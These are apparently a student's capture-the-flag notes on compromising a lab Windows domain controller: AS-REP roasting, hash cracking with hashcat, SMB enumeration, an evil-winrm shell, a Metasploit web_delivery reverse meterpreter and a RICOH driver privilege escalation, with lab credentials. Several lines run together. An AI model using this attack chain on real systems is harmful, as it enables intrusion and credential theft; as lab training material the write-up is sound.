Nmap scan:
- Kerberos
- Kerberoast?
- What I did wrong:
- You can kerberos based on potential users (from a user page) with no pass to gain access
- SMB secure
- Can we find user to access it?
- Website (Microsoft IIS)
- Can we gain access from here?
- default credentials?
- can we use evil winrm (port 5985)?
Kerberoast with no pass:
GetNPUsers.py -dc-ip 10.10.10.175 -no-pass EGOTISTICAL-BANK.local/fsmithhash:
Can we crack it?
hashcat -m 13100 egoHash.txt rockyou.txt -O13100 didn’t work. krb5asrep is 18200!
find it by doing:
hashcat --help | grep Kerberoshashcat -m 18200 egoHash.txt rockyou.txt -Ocracked user:
fsmith:Thestrokes23Pass the hash?:
cme smb 192.168.218.0/24 -u fsmith -H Thestrokes23 --local-authNo, it has to be NTLM hash (we need to crack the hash to
SAM Dump:
cme smb 10.10.10.175 -u fsmith -H Thestrokes23 --local-auth --samTGS?
EGOTISTICAL-BANK.local/fsmith
sudo GetUserSPNs.py EGOTISTICAL-BANK.local/fsmith:Thestrokes23 -dc-ip 10.10.10.175 -requestDidn’t work but we found HSmith. Can we kerberoast it?
GetNPUsers.py -dc-ip 10.10.10.175 -no-pass EGOTISTICAL-BANK.local/hsmithno
Didn’t work. SMB with user?
enumerate smb shares:
cme smb -u 'fsmith' -p 'Thestrokes23' --shares 10.10.10.175Access the read shares:
smbclient \\\\10.10.10.175\\NETLOGON -U fsmith%Thestrokes23smbclient \\\\10.10.10.175\\print$ -U fsmith%Thestrokes23smbclient \\\\10.10.10.175\\RICOH Aficio SP -U fsmith%Thestrokes23that’s not a folder! exploit?
on metasploit
Needs a session. Ports open for the server?
NEW:
What is WinRM? Port 5985
WinRM | Metasploit Documentation Penetration Testing Software, Pen Testing Security
Gaining access with metasploit not working. Gain a normal shell then web_delivery?
Update?
use scanner/winrm/winrm_login
run http://fsmith:Thestrokes23@10.10.10.175:5985Um
set domain EGOTISTICAL-BANK.local
set username fsmith
set password Thestrokes23
set rhost 10.10.10.175
run http://fsmith:Thestrokes23@10.10.10.175:5985still a no
evil winrm:
evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23We get a powershell
use it to go to metasploit (web_delivery):
msfconsole
use exploit/multi/script/web_delivery
set lhost tun0
set payload windows/meterpreter/reverse_http
set target 2 #PSH
set srvport 6999
run -j
sessions -i 1It hangs. x64?
set payload windows/x64/meterpreter/reverse_httpWorked!
background session and try the escalation:
use it to gain access with user then escalate with
use windows/local/ricoh_driver_privesc
set payload windows/x64/meterpreter/reverse_tcp
set lhost tun0
set lport 4445
set session 1
runHanging. Try something faster and come back to this if it’s not working?
exploit suggester:
use post/multi/recon/local_exploit_suggesterPurple worked!
